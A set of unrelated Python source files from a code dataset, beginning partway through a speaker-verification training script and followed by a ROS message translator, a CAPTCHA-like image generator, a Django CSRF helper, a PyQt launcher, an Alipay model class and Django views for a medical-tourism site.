for i_v,v in enumerate(V):
fnq='{}/*{}*-R{}*'.format(dr,v,r,FDext) #fnq=args.dir+ '/' + s + '-' + t + l + '*'
#fnq='{}/{}-*R{}*'.format(dr,s,r) #fnq=args.dir+ '/' + s + '-' + t + l + '*'
F=[f.split('/')[-1] for f in glob.glob(fnq)] #file list
if len(F)==0:
print('###########No files with {}'.format(fnq))
import pdb;pdb.set_trace(); #for debug
F.sort()
np.random.seed(seed=32)
Fp=np.random.permutation(F)
Ftrain[(v,r)]=Fp[:len(Fp)/2]
#Ftest[(s,r)]=Fp[:len(Fp)/2]
#Ftest[(s,r)]=Fp[len(Fp)/2:]
for i_r,r in enumerate(RX):
for i_v,v in enumerate(V):
fnq='{}/*{}*-R{}*'.format(dr,v,r,FDext) #fnq=args.dir+ '/' + s + '-' + t + l + '*'
#fnq='{}/{}-*R{}*'.format(dr,s,r) #fnq=args.dir+ '/' + s + '-' + t + l + '*'
F=[f.split('/')[-1] for f in glob.glob(fnq)] #file list
if len(F)==0:
print('###########No files with {}'.format(fnq))
import pdb;pdb.set_trace(); #for debug
F.sort()
np.random.seed(seed=32)
Fp=np.random.permutation(F)
#Ftrain[(s,r)]=Fp[:len(Fp)/2]
#Ftest[(s,r)]=Fp[:len(Fp)/2]
Ftest[(v,r)]=Fp[len(Fp)/2:]
###############
# import pdb;pdb.set_trace(); #for debug
# for i_m,m in enumerate(M):#machine
nP=0;nF=0
for key in Ftrain.keys():
for i_f,f in enumerate(Ftrain[key]):
# import pdb;pdb.set_trace(); #for debug
v,r,v2=vrv2_f(f)
# s,r,s2=vrv2_f(f)
# import pdb;pdb.set_trace(); #for debug
if v == m:
ytarget=1
nP+=1
else:#s != m
if m!=v2:
ytarget=-1
nF+=1
else:
ytarget=0 #don't train
print('#m{}:{} excludes {} from negative examples.'.format(i_m,m,f));
if ytarget !=0:
if method[0]=='MFCC':
# import pdb;pdb.set_trace(); #for debug
x1=np.array(pd.read_csv('{}/{}'.format(dr,f),delim_whitespace=True,dtype=np.float64,header=None))
if E_MFCC==0:
x1=x1[:,:-1]
else:pass
x=x1.mean(axis=0)
# x=np.array(pd.read_csv('{}/{}'.format(dr,f),delim_whitespace=True,dtype=np.float64,header=None))
# if method[0]=='MFCC' and E_MFCC==0:
elif method[0]=='LPCSE1':
# import pdb;pdb.set_trace(); #for debug
# print("check fn={}".format('{}/{}'.format(dr,f)))
x1=np.array(pd.read_csv('{}/{}'.format(dr,f),delim_whitespace=True,dtype=np.float64,header=None))
x=x1.mean(axis=0)
elif method[0]=='N':
# import pdb;pdb.set_trace(); #for debug
x=np.array([1])
else:
x=np.array(pd.read_csv('{}/{}'.format(dr,f),delim_whitespace=True,dtype=np.float64,header=None)).reshape((-1,))
# import pdb;pdb.set_trace(); #for debug
if math.isnan(x[0]):
import pdb;pdb.set_trace(); #for debug
if args.lx[0]=='1':
x=np.log1p(x)
# x=np.log10(0.01+x)
# x=np.log10(x)
normx=1
if args.nlz=='norm':
normx=np.linalg.norm(x)
elif args.nlz=='max':
normx = x.max()
if nx>0:
x = x/normx
if math.isnan(x[0]):
print('### Error: nan arize for m={},v={}'.format(m,v));
import pdb;pdb.set_trace(); #for debug
else:
Fall.append(f) #Fall=Fperm??
for i in range(len(x)):
fptrain.write('%e ' % (x[i]))# fptrain.write('%.10e ' % (x[i]))
if fntrain_check==1:
fptrain.write('{} {}\n'.format(ytarget,f))
else:
fptrain.write('{}\n'.format(ytarget))
ytrain.append(ytarget)
n_train=len(Fall)
print('#n_train={},nP={},nF={}'.format(n_train,nP,nF))
fptrain.close()
fptest.close()
# import pdb;pdb.set_trace(); #for debug
# for i_m,m in enumerate(M):#machine
if i_m == 0:
fntrain_m='{}/{}{}'.format(dr,FDext,fntrain) #same x,different y for different m?
cmd='cp {} {}'.format(fntrain,fntrain_m) #
if fntrain_check==1:
fntrain_m='{}/{}{}_{}.dat'.format(dr,FDext,fbtrain,m) #same x,different y for different m
cmd='cp {} {}'.format(fntrain,fntrain_m) #
else:pass
mylib.myshell(cmd)
cmd0='export AF={}/{}{}'.format(args.dr,FDext,fntrain)
cmd=('echo "{}">tmp/AF.env'.format(cmd0))
mylib.myshell(cmd)
print('#Type "source tmp/AF.env"\n# or "{}"'.format(cmd0))
# print('#AF={}/{} #saved in ${}AF{}{} '.format(args.dr,FDext,'{','}',fntrain))
# print('#saved {} as AF={}/{}'.format(fntrain_m,dr,FDext))
# print('#saved {} as AF={}/{}'.format(fntrain_m,dr,FDext))
if args.AF=='q':
if fntrain_check==1:
continue;
else:
exit(0)
else:pass
else:pass
# mylib.myshell('cp {} {}/{}'.format(fntest,dr,fntest))
k=len(x)
if args.AF !='_':
# AF=(args.AF).split(':')
## import pdb;pdb.set_trace(); #for debug
# Ftrain=np.array(pd.read_csv('{}{}.dat'.format(AF[0],fbtrain),delim_whitespace=True,dtype=np.float64,header=None))
# for i in range(0,len(AF)):
# Ftrain1=np.array(pd.read_csv('{}{}.dat'.format(AF[i],fbtrain),delim_whitespace=True,dtype=np.float64,header=None))
# Ftrain=np.concatenate([Ftrain[:,:-1],Ftrain1],axis=1)
# import pdb;pdb.set_trace(); #for debug
# Ftrain1=pd.read_csv(fntrain,delim_whitespace=True,dtype=np.str,header=None) #current real target
Ftrain1=np.array(pd.read_csv(fntrain,delim_whitespace=True,dtype=np.float64,header=None)) #current target (./train_xy.dat)
if method[0]=='N':
Ftrain1=np.delete(Ftrain1,0,1)
# import pdb;pdb.set_trace(); #for debug
Ftrain=np.concatenate([FtrainAF,Ftrain1],axis=1)
df=pd.DataFrame(Ftrain)
df.to_csv('{}'.format(fntrain),index=False,sep=' ',header=None)
k=Ftrain.shape[1]-1
else:pass
# import pdb;pdb.set_trace(); #for debug
# k=Ftrain.shape[1]-1
###trainig and test of oob
cmd='ensrs {} {} {}-{} k:{} ib:0:0:0:0 y:-1:1:-1:1 x:0:0:0:1 DISP:0 nop:1 bg:/dev/null'.format(fntrain,args.mbas,N,N,k)
# cmd='ensrs {}.dat {} {}-{} k:{} ib:0:0:0:0 y:-1:1:-1:1 x:0:0:0:1 DISP:0 nop:1 bg:/dev/null >> ./tmp/ensrs.log'.format(fntrain,args.mbas,args.N,args.N,k)
# sprintf(com,"ensrs %sxy.dat %s %d-%d:1 k:%d ib:0:0:0:0 y:-1:1:-1:1 x:0:0:0:1 DISP:0 bg:/dev/null > /dev/null",fntrain,mbas,N,N,k);
# import pdb;pdb.set_trace(); #for debug
print 'Executing1 {}'.format(cmd)
fnpred='predict+oob.dat' #direct pred
fnoob='pred+oob-{}.dat'.format(m) #oob pred
# import pdb;pdb.set_trace(); #for debug
while True: #??
sys.stdout.flush()
mylib.myshell(cmd)
if os.path.exists(os.path.expanduser(fnpred)):
break
print '#Try creating {} again!'.format(fnpred)
# time.sleep(1)
mylib.myshell('cp {} {}'.format(fnpred,fnoob)) #oob-output
# sys.stdout.flush()
# mylib.myshell(cmd)
## mylib.myshell('if [ ! -e {} ]; then sleep 2 ; fi ; cp {} {}'.format(fnpred,fnpred,fnoob)) #oob-output
# mylib.myshell('while [ ! -e {} ]; do echo "#Waiting creation of {}."; sleep 1 ; done; cp {} {}'.format(fnpred,fnpred,fnpred,fnoob)) #oob-output
###test with learned
if nRX>0:
cmd='ensrs {} {} {}-{}:1 k:{} ib:0:0:0:0 y:-1:1:-1:1 x:0:0:0:1 DISP:0 bg:{}.dat >> ./tmp/ensrs.log'.format(fntrain,args.mbas,N,N,k,fntest);
print '#Executing2 {}'.format(cmd)
sys.stdout.flush()
mylib.myshell(cmd)
else:pass
###speaker verification
# import pdb;pdb.set_trace(); #for debug
yoob3=np.array(pd.read_csv(fnoob,delim_whitespace=True,header=None).ix[:,0:2]).astype('float64')
yoob=yoob3[:,0]
yt=yoob3[:,2]
# yoob=np.array(pd.read_csv(fnoob,delim_whitespace=True,dtype=np.float64,header=None)[0:3])
if nRX>0:#??? if nRX>=0:#???
# import pdb;pdb.set_trace(); #for debug
ypred=np.array(pd.read_csv(fnpred,delim_whitespace=True,header=None).ix[:,0]).astype('float64')
yp=np.concatenate([yoob,ypred],axis=0)
else:
yp=yoob
# import pdb;pdb.set_trace(); #for debug
# print "m,Fall=",m,Fall
y=[]
vv=[] #
TP=TN=FP=FN=0;
n_Fall=len(Fall)
for i_f,f in enumerate(Fall):
v,r,v2=vrv2_f(f) # s,r,s2=srs2_f(f)
if m == v or m == v2: #yp should be positive
y.append(1)
if yp[i_f] > 0: #Positive
TP+=1
vv.append('TP')
if yt[i_f] <= 0:
print m,v,r,v2,yoob3[i_f]
# import pdb;pdb.set_trace(); #for debug
print 'TP but FP yt<=0'
else:
FN+=1
vv.append('FN')
print('FN:{} yp={} m={} v={} v2={}'.format(f,yp[i_f],m,v,v2))
if yt[i_f] <=0:
print m,v,r,v2,yoob3[i_f]
# import pdb;pdb.set_trace(); #for debug
print 'FN but TN yt<0'
else: #yp should be Negative
y.append(-1)
if yp[i_f] > 0: #Positive
FP+=1
vv.append('FP')
print('FP:{} yp={} m={} v={} v2={}'.format(f,yp[i_f],m,v,v2))
if yt[i_f] >0:
print m,v,r,v2,yoob3[i_f]
# import pdb;pdb.set_trace(); #for debug
print 'FP but TP yt>0'
else:
TN+=1
vv.append('TN')
if yt[i_f] >0:
print m,v,r,v2,yoob3[i_f]
# import pdb;pdb.set_trace(); #for debug
print 'TN but FN yt<=0'
if i_f == n_train-1 or i_f == n_Fall-1:
ER =(FP+FN)
n =(TP+TN+FP+FN)
TPFN=(TP+FN)
FPTN=(FP+TN)
TPR=100.*TP/float(TPFN) if TPFN >0 else 0;
FNR=100.*FN/float(TPFN) if TPFN >0 else 0;
FPR=100.*FP/float(FPTN) if FPTN >0 else 0;
TNR=100.*TN/float(FPTN) if FPTN >0 else 0;
ERR=100.*ER/float(n) if n>0 else 0;
ret='{:.2f} {:.2f} {:.2f} {:.2f} {:.2f} = {} {} {} {} {} {} {} {} {} {} {} #TP,TN,FP,FN,ER=.#n,m,R,RX,mbas,N'.format(TPR,TNR,FPR,FNR,ERR,TP,TN,FP,FN,ER,n,m,args.R,args.RX,args.mbas,N)
if '1' in DISP: print(ret) ##DISP??
# import pdb;pdb.set_trace(); #for debug
if i_f == n_train-1:
fpr.write('{}\n'.format(ret))
elif nRX>0:
fprX.write('{}\n'.format(ret))
TP=TN=FP=FN=0;
# import pdb;pdb.set_trace(); #for debug
fpr.flush()
# import pdb;pdb.set_trace(); #for debug
elapsed_time=time.time()-start_time
etime='{:.2f}s({})'.format(elapsed_time,str(datetime.timedelta(seconds=elapsed_time))[:-3])
print('#elapsed time:{}@{} for m{}:{}'.format(etime,datetime.datetime.now(),i_m,m))
if DISP[2]=='1':
for i_f,f in enumerate(Fall):
print "{} {:+.2f} {} {} {} #yp y f m ytrain={}".format(f,yp[i_f],y[i_f],m,vv[i_f],ytrain[i_f])
sys.stdout.flush()
# import pdb;pdb.set_trace(); #for debug
# sprintf(com,"%.2f %.2f %.2f %.2f %.3e %d %d #TP,TN,FP,FN,ERR,n,sm%d",TP,TN,FP,FN,ER,n,sm,sm);
# fpr.write('#result of cmd="{}"\n'.format(cmd0))
# fpr.write('export #AF={}/{} #saved in ${}AF{}{}\n'.format(args.dr,FDext))
fpr.close()
if nRX>0: fprX.close()
# import pdb;pdb.set_trace(); #for debug
cmd='cat {}|awk \'BEGIN{{n=0;TP=TN=FP=FN=ERR=0}}{{TP+=$7;TN+=$8;FP+=$9;FN+=$10;ERR+=$11;n+=$12;}}END{{RC=TP/(TP+FN);PR=TP/(TP+FP);F=2*RC*PR/(RC+PR);printf("#TP%.2f TN%.2f FP%.2f FN%.2f ER%.2f RC%.2f PR%.2f F%.2f n%d k{} {} {}\\n",100.*TP/(TP+FN),100.*TN/(FP+TN),100.*FP/(FP+TN),100.*FN/(TP+FN),100.*ERR/n,100.*RC,100.*PR,100.*F,n)}}\'>>{}'.format(fnr,k,FDextr,etime,fnr)
# cmd='cat {}|awk \'BEGIN{{n=0;TP=TN=FP=FN=ERR=0}}{{TP+=$7;TN+=$8;FP+=$9;FN+=$10;ERR+=$11;n+=$12;}}END{{RC=TP/(TP+FN);PR=TP/(TP+FP);F=2*RC*PR/(RC+PR);printf("#TP%.3f TN%.3f FP%.3f FN%.3f ER%.3f RC%.3f PR%.3f F%.3f n%d k{} {} {}\\n",TP/(TP+FN),TN/(FP+TN),FP/(FP+TN),FN/(TP+FN),ERR/n,RC,PR,F,n)}}\'>>{}'.format(fnr,k,FDextr,etime,fnr)
# cmd='cat {}|awk \'BEGIN{{n=0;TP=TN=FP=FN=ERR=0}}{{TP+=$7;TN+=$8;FP+=$9;FN+=$10;ERR+=$11;n+=$12;}}END{{RC=TP/(TP+FN);PR=TP/(TP+FP);F=2*RC*PR/(RC+PR);printf("#TP%.3f TN%.3f FP%.3f FN%.3f ER%.3f RC%.3f PR%.3f F%.3f n%d k{} {}lx{}sd{} {}\\n",TP/(TP+FN),TN/(FP+TN),FP/(FP+TN),FN/(TP+FN),ERR/n,RC,PR,F,n)}}\'>>{}'.format(fnr,k,FDextr,args.lx,args.sd,etime,fnr)
#
# cmd='cat {}'.format(fnr)+'|awk \'BEGIN{n=0;TP=TN=FP=FN=ERR=0}{n+=$13;TP+=$7;TN+=$8;FP+=$9;FN+=$10;ERR+=$11}END{RC=TP/(TP+FN);PR=TP/(TP+FP);F=2*RC*PR/(RC+PR);printf("#TP%.3f TN%.3f FP%.3f FN%.3f ER%.3f RC%.3f PR%.3f F%.3f '+'k{} {} {}\\n"'.format(k,FD[0],etime)+',TP/(TP+FN),TN/(FP+TN),FP/(FP+TN),FN/(TP+FN),ERR/n,RC,PR,F)}\''+ '>>{}'.format(fnr)
# cmd='cat {}'.format(fnr)
# +"|awk 'BEGIN{n=0;TP=TN=FP=FN=ERR=0}{n+=$13;TP+=$7;TN+=$8;FP+=$9;FN+=$10;ERR+=$11}END{RC=TP/(TP+FN);PR=TP/(TP+FP);F=2*RC*PR/(RC+PR);"
# +'printf("#TP%.3f TN%.3f FP%.3f FN%.3f ER%.3f RC%.3f PR%.3f F%.3f '
# +'k{} {} {}\\n"'.format(k,FD[0],etime)
# +",TP/(TP+FN),TN/(FP+TN),FP/(FP+TN),FN/(TP+FN),ERR/n,RC,PR,F)}'"
# + '>>{}'.format(fnr)
#
# cmd='cat {}|awk \''.format(fnr)
# +'BEGIN{n=0;TP=TN=FP=FN=ERR=0}{n+=$13;TP+=$7;TN+=$8;FP+=$9;FN+=$10;ERR+=$11}END{RC=TP/(TP+FN);PR=TP/(TP+FP);F=2*RC*PR/(RC+PR);printf("#TP%.3f TN%.3f FP%.3f FN%.3f ER%.3f RC%.3f PR%.3f F%.3f'
# +'k{} {} {}\\n",TP/(TP+FN),TN/(FP+TN),FP/(FP+TN),FN/(TP+FN),ERR/n,RC,PR,F)}'.format(k,FD[0],etime)
# +"'>>{}'.format(fnr)
#
# cmd='cat {}'.format(fnr)+'|awk \'BEGIN{n=0;TP=TN=FP=FN=ERR=0}{n+=$13;TP+=$7;TN+=$8;FP+=$9;FN+=$10;ERR+=$11}END{RC=TP/(TP+FN);PR=TP/(TP+FP);F=2*RC*PR/(RC+PR);printf("%.3f %.3f %.3f %.3f %.3f %.3f %.3f %.3f #TP TN FP FN ER RC PR F#'+' k{} FD:{} {}\\n"'.format(k,args.FD,etime)+',TP/n,TN/n,FP/n,FN/n,ERR/n,RC,PR,F)}\''+ '>>{}'.format(fnr)
# print cmd
mylib.myshell(cmd)
# cmd='cat {} #oob prediction of training data k{} {} {}'.format(fnr,k,args.FD,etime)
mylib.myshell('echo "python {}" >> {}'.format(cmd0,fnr))
mylib.myshell('echo "export AF={}/{}{}" >> {}'.format(args.dr,FDext,fntrain,fnr))
# mylib.myshell('echo "#export AF={}/{} #saved in \${}AF{}{}" >> {}\n'.format(args.dr,FDext,'{','}',fntrain,fnr))
cmd='cat {}'.format(fnr)
mylib.myshell(cmd)
print('\n#Do "cat {}"\nto see the result'.format(fnr,cmd))
if nRX>0:
cmd='cat {}'.format(fnrX)+'|awk \'BEGIN{n=0;TP=TN=FP=FN=ERR=0}{n++;TP+=$1;TN+=$2;FP+=$3;FN+=$4;ERR+=$5}END{printf("%.2f %.2f %.2f %.2f %.2f %d #mean TP TN FP FN ERR n'+' k{}sd{} {}\\n"'.format(k,FDextr,args.sd,etime)+',TP/n,TN/n,FP/n,FN/n,ERR/n,n)}\''+ '>>{}'.format(fnrX)
mylib.myshell(cmd)
cmd='cat {} #prediction of test data'.format(fnrX)
print cmd
mylib.myshell(cmd)
# print('#result of cmd0="{}"\n'.format(cmd0))
|
StarcoderdataPython
|
1732822
|
<gh_stars>0
# ROS
import roslibpy
# Tranlate functions
from .translate_functions import *
# Python
import sys
import time
import json
import math
import socket
# IS
from is_wire.core import Channel, Message, Logger, Status, StatusCode
from .is_ros_pb2 import ROSTranslateRequest, ROSTranslateReply
from is_wire.rpc import ServiceProvider, LogInterceptor
from google.protobuf.any_pb2 import Any
def get_obj(callable, obj):
value = callable()
if value is not None:
obj.CopyFrom(value)
def get_val(callable, obj, attr):
value = callable()
if value is not None:
setattr(obj, attr, value)
def get_class( kls ):
kls = kls.replace('is', 'is_msgs')
kls = kls.replace('camera', 'camera_pb2')
kls = kls.replace('common', 'common_pb2')
kls = kls.replace('image', 'image_pb2')
kls = kls.replace('power', 'power_pb2')
kls = kls.replace('robot', 'robot_pb2')
kls = kls.replace('tests', 'tests_pb2')
kls = kls.replace('validate', 'validate_pb2')
parts = kls.split('.')
module = ".".join(parts[:-1])
m = __import__( module )
for comp in parts[1:]:
m = getattr(m, comp)
return m
class ROSTranslator(object):
def __init__(self, robot_config, correspondence_dict):
self.logger = Logger("ROSTranslator")
self.robot_id = robot_config['robot_id']
self.robot_ip = robot_config['robot_ip']
self.robot_port = robot_config['robot_port']
self.correspondence = correspondence_dict
self.ros = roslibpy.Ros(host=str(self.robot_ip), port=int(self.robot_port))
self.ros.run()
# -=-=-=-=-=-=-=-=-=-=-= ROS TOPICS, SERVICES ... =-=-=-=-=-=-=-=-=-=-=-=-
def ros_topic_publisher(self, ros_topic, message_type, message_json):
publisher = roslibpy.Topic(self.ros, ros_topic, message_type, queue_size=10, latch=True)
for i in range(1,11):
publisher.publish(roslibpy.Message(message_json))
publisher.unadvertise()
def ros_topic_subscriber(self, ros_topic, message_type):
self.listener = roslibpy.Topic(self.ros, ros_topic, message_type)
self.listener.subscribe(lambda message: self.subscriber_callback(message))
while self.listener.is_subscribed: time.sleep(1)
return self.subscriber_data # return json
def subscriber_callback(self, message):
self.subscriber_data = message
self.listener.unsubscribe()
def ros_topic_list(self):
return self.ros.get_topics()
def ros_topic_msg_type(self, ros_topic):
return self.ros.get_topic_type(ros_topic)
def ros_service(self, ros_service, message_type, message_json=None):
service = roslibpy.Service(self.ros, ros_service, message_type)
request = roslibpy.ServiceRequest(message_json)
result = service.call(request)
# -=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def get_info(self, translate_request, ctx):
translate_reply = ROSTranslateReply()
if translate_request.topic == '':
translate_reply.data = str(self.ros_topic_list())
return translate_reply
msg_type = self.ros.get_topic_type(translate_request.topic) # return string
translate_reply.data = str(self.ros_topic_subscriber(translate_request.topic, msg_type))
return translate_reply
def translate(self, translate_request, ctx):
if translate_request.topic == '':
topics = self.ros_topic_list()
return Status(StatusCode.CANCELLED,
why='No topic received. List of available topics: {}'.format(topics))
is_msg_type_class = get_class(translate_request.any.type_url.split('/')[-1])
is_msg = is_msg_type_class()
translate_request.any.Unpack(is_msg)
if translate_request.function == '':
method_name = self.correspondence[translate_request.any.type_url.split('/')[-1].split('.')[-1]]
else:
method_name = translate_request.function
funcs = globals().copy()
funcs.update(locals())
method = funcs.get(method_name)
if not method:
raise NotImplementedError("Method/Function %s not implemented" % method_name)
function = getattr(method, method_name)
maybe_ok = function(self, translate_request)
if maybe_ok != Status(StatusCode.OK):
return maybe_ok
return Status(StatusCode.OK)
def run(self,broker_uri):
service_name = "ROSTranslator.{}".format(self.robot_id)
publish_channel = Channel(broker_uri)
rpc_channel = Channel(broker_uri)
server = ServiceProvider(rpc_channel)
logging = LogInterceptor()
server.add_interceptor(logging)
server.delegate(
topic=service_name + ".GetInfo",
request_type=ROSTranslateRequest,
reply_type=ROSTranslateReply,
function=self.get_info)
server.delegate(
topic=service_name + ".Translate",
request_type=ROSTranslateRequest,
reply_type=ROSTranslateReply,
function=self.translate)
self.logger.info("RPC listening for requests")
while True:
try:
message = rpc_channel.consume(timeout=0)
if server.should_serve(message):
server.serve(message)
except socket.timeout:
pass
rospy.spin()
|
StarcoderdataPython
|
40613
|
import PIL.Image,PIL.ImageDraw,PIL.ImageFont,PIL.ImageFilter
import random
#随机字母
def rndchar():
return chr(random.randint(65, 90))
#random.randint()函数生成随机数字,数字范围为在65 到90内,在此范围内的美国标准信息编码是大写的A-Z
#chr(kk) 函数,kk为整数,asc编码值,函数返回asc编码为kk 的对应的字符
#随机颜色1
def rndcolor():
return random.randint(64, 255),random.randint(64, 255),random.randint(64, 255)
#随机颜色2
def rndcolor2():
return random.randint(32, 127), random.randint(32, 127), random.randint(32, 127)
width = 60*4
height = 60
image = PIL.Image.new('RGB', (width, height), (255, 255, 255))
#RGB文件:RGB色彩模式是工业界的一种颜色标准,是通过对红®、绿(G)、蓝(B)三个颜色通道的变化以及它们相互之间的叠加来得到各式各样的颜色的,RGB即是代表红、绿、蓝三个通道的颜色
#创建font对象
font = PIL.ImageFont.truetype('fonts.ttf', 36)
#加载一个TrueType或者OpenType字体文件,并且创建一个字体对象,这里的路径可以打开控制面板->字体->选择一种字体,将字体样式的路径复制到这里这个函数从指定的文件加载了一个字体对象,并且为指定大小的字体创建了字体对象。
#创建draw对象
draw = PIL.ImageDraw.Draw(image)
#填充每个像素
for x in range(width):
for y in range(height):
draw.point((x, y), fill=rndcolor())
#输出文字
for t in range(4):
draw.text((60*t+10, 10), rndchar(), font=font, fill=rndcolor2())
image = image.filter(PIL.ImageFilter.BLUR)
image.save('test2.png')
|
StarcoderdataPython
|
3387128
|
from django.core import context_processors
from django.utils import encoding, functional, html
def csrf(request):
# Django does it lazy like this. I don't know why.
def _get_val():
token = context_processors.csrf(request)['csrf_token']
# This should be an md5 string so any broken Unicode is an attacker.
try:
return html.escape(unicode(token))
except UnicodeDecodeError:
return ''
return {'csrf_token': functional.lazy(_get_val, unicode)()}
|
StarcoderdataPython
|
1619353
|
<reponame>rafaellehmkuhl/OpenCV-Python-GUI<filename>main.py
if __name__ == '__main__':
import sys
from PyQt5.QtWidgets import QApplication
from CvPyGui import Main
app = QApplication(sys.argv)
window = Main.MyApp()
window.show()
sys.exit(app.exec_())
|
StarcoderdataPython
|
3375493
|
<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class ActivityMerchantOrder(object):
def __init__(self):
self._activity_type = None
self._audit_result = None
self._fail_reason = None
self._order_id = None
self._rate = None
@property
def activity_type(self):
return self._activity_type
@activity_type.setter
def activity_type(self, value):
self._activity_type = value
@property
def audit_result(self):
return self._audit_result
@audit_result.setter
def audit_result(self, value):
self._audit_result = value
@property
def fail_reason(self):
return self._fail_reason
@fail_reason.setter
def fail_reason(self, value):
self._fail_reason = value
@property
def order_id(self):
return self._order_id
@order_id.setter
def order_id(self, value):
self._order_id = value
@property
def rate(self):
return self._rate
@rate.setter
def rate(self, value):
self._rate = value
def to_alipay_dict(self):
params = dict()
if self.activity_type:
if hasattr(self.activity_type, 'to_alipay_dict'):
params['activity_type'] = self.activity_type.to_alipay_dict()
else:
params['activity_type'] = self.activity_type
if self.audit_result:
if hasattr(self.audit_result, 'to_alipay_dict'):
params['audit_result'] = self.audit_result.to_alipay_dict()
else:
params['audit_result'] = self.audit_result
if self.fail_reason:
if hasattr(self.fail_reason, 'to_alipay_dict'):
params['fail_reason'] = self.fail_reason.to_alipay_dict()
else:
params['fail_reason'] = self.fail_reason
if self.order_id:
if hasattr(self.order_id, 'to_alipay_dict'):
params['order_id'] = self.order_id.to_alipay_dict()
else:
params['order_id'] = self.order_id
if self.rate:
if hasattr(self.rate, 'to_alipay_dict'):
params['rate'] = self.rate.to_alipay_dict()
else:
params['rate'] = self.rate
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = ActivityMerchantOrder()
if 'activity_type' in d:
o.activity_type = d['activity_type']
if 'audit_result' in d:
o.audit_result = d['audit_result']
if 'fail_reason' in d:
o.fail_reason = d['fail_reason']
if 'order_id' in d:
o.order_id = d['order_id']
if 'rate' in d:
o.rate = d['rate']
return o
|
StarcoderdataPython
|
1722549
|
from django.contrib.auth.decorators import login_required
from django.contrib.auth.forms import AdminPasswordChangeForm, PasswordChangeForm, UserCreationForm
from django.contrib.auth import update_session_auth_hash, authenticate, login
from django.contrib import messages
from django.contrib.auth.models import User
from django.core.mail import send_mail
from django.utils.html import strip_tags
from django.contrib.sites.shortcuts import get_current_site
from django.http import JsonResponse
from django.shortcuts import render, redirect
from django.template.loader import render_to_string
from django.utils.encoding import force_bytes, force_text
from django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode
from django.views import View
from social_django.models import UserSocialAuth
from hospital.models import Doctor, Appointment, Hospital
from hospital.views import HospitalsAll
from hospital.forms import InviteDocForm
from landing.models import Region, City, Profile
from landing.tokens import account_activation_token
from .forms import ProfileForm, UsernameForm, SignUpForm, HospitalForm
from medtour import settings
from landing.utils import sg_mail
def land(request):
return render(request, 'landing/base.html')
class CompleteHospitalProfile(View):
def get(self, request):
form = HospitalForm(instance=request.user.hospital)
return render(request, 'landing/hospital_profile_complete.html', {'form': form})
def post(self, request):
form = HospitalForm(request.POST, instance=request.user.hospital)
if form.is_valid():
form.save()
messages.success(request, 'Your profile was successfully updated!')
return redirect('home')
else:
messages.error(
request, 'Slug is already taken, please try another one.')
return render(request, 'landing/hospital_profile_complete.html', {'form': form})
class ChangeUsername(View):
def get(self, request):
form = UsernameForm(instance=request.user)
return render(request, 'landing/username.html', {'form': form})
def post(self, request):
form = UsernameForm(request.POST, request.user)
if form.is_valid():
form = UsernameForm(request.POST, instance=request.user)
form.save()
messages.success(
request, 'Your username was successfully updated!')
update_session_auth_hash(request, request.user)
return redirect('username')
else:
messages.error(
request, 'Username is already taken, please try another one.')
return render(request, 'landing/username.html', {'form': form})
def activate(request, uidb64, token):
try:
uid = force_text(urlsafe_base64_decode(uidb64))
user = User.objects.get(pk=uid)
except (TypeError, ValueError, OverflowError, User.DoesNotExist):
user = None
if user is not None and account_activation_token.check_token(user, token):
user.is_active = True
user.profile.email_confirmed = True
user.save()
hospital = Hospital(user=user, email=user.email,
name=user.first_name, slug=user.username).save()
login(request, user, backend='django.contrib.auth.backends.ModelBackend')
return redirect('complete_hospital_profile')
else:
return HospitalsAll.as_view()(request, message=settings.INVALID_ACTIVATION_STRING)
def account_activation_sent(request):
return render(request, 'registration/account_activation_sent.html')
def signup(request):
if request.method == 'POST':
form = SignUpForm(request.POST)
if form.is_valid():
user = form.save(commit=False)
user.is_active = False
user.save()
current_site = get_current_site(request)
subject = 'Activate Your MedTour Account'
from_email = settings.EMAIL_HOST_USER
message = render_to_string('registration/account_activation_email.html', {
'user': user,
'domain': current_site.domain,
'uid': force_text(urlsafe_base64_encode(force_bytes(user.pk))),
'token': account_activation_token.make_token(user),
})
plain_msg = strip_tags(message)
send_mail(subject, plain_msg, from_email, [
user.email], html_message=message, fail_silently=True)
response = HospitalsAll.as_view()(request, good_message=settings.EMAIL_SENT_STRING)
return response
else:
form = SignUpForm()
return render(request, 'registration/signup.html', {'form': form})
class HomeView(View):
def get(self, request, message=None, good_message=None):
doctors = None
hospital_appointments = None
try:
if request.user.hospital:
if not request.user.hospital.user.profile.city:
message = "Please add city to your profile, for better visibility on platform."
hospital = request.user.hospital
doctors = Doctor.objects.filter(hospital=hospital)
hospital_appointments = Appointment.objects.filter(
doctor__in=doctors)
form = InviteDocForm(request.POST or None)
return render(request, 'landing/home.html', {'doctors': doctors,
'happs': hospital_appointments,
'form': form,
'message': message,
'good_message': good_message
})
except Hospital.DoesNotExist:
pass
try:
if request.user.doctor:
slug = request.user.doctor.slug
doctor = Doctor.objects.get(slug=slug)
doc_appointments = Appointment.objects.filter(
doctor=doctor)
return render(request, 'landing/doc_home.html', {'happs': doc_appointments, 'message': message,
'good_message': good_message})
except Doctor.DoesNotExist:
pass
patient_appointments = Appointment.objects.filter(
patient__user=request.user) or None
return render(request, 'landing/patient_home.html', {'doctors': doctors,
'happs': hospital_appointments,
'papps': patient_appointments,
'message': message,
'good_message': good_message
})
def post(self, request, message=None, good_message=None):
form = InviteDocForm(request.POST or None)
if form.is_valid():
doctor = form.save(commit=False)
doctor.hospital = Hospital.objects.get(
slug=request.user.hospital.slug)
doctor.slug = doctor.user.username
form.save()
return redirect('home')
return render(request, 'landing/home.html', {'form': form, 'message': message,
'good_message': good_message})
# only4 testing
def test_func():
return True
class AccountOverview(View):
def get(self, request):
user = request.user
try:
google_login = user.social_auth.get(provider='google-oauth2')
except UserSocialAuth.DoesNotExist:
google_login = None
try:
twitter_login = user.social_auth.get(provider='twitter')
except UserSocialAuth.DoesNotExist:
twitter_login = None
try:
facebook_login = user.social_auth.get(provider='facebook')
except UserSocialAuth.DoesNotExist:
facebook_login = None
can_disconnect = (user.social_auth.count() >
1 or user.has_usable_password())
form = ProfileForm(instance=request.user.profile)
return render(request, 'landing/profile.html', {
'twitter_login': twitter_login,
'facebook_login': facebook_login,
'google_login': google_login,
'user': user,
'form': form,
'can_disconnect': can_disconnect
})
def post(self, request):
form = ProfileForm(request.POST, instance=request.user.profile)
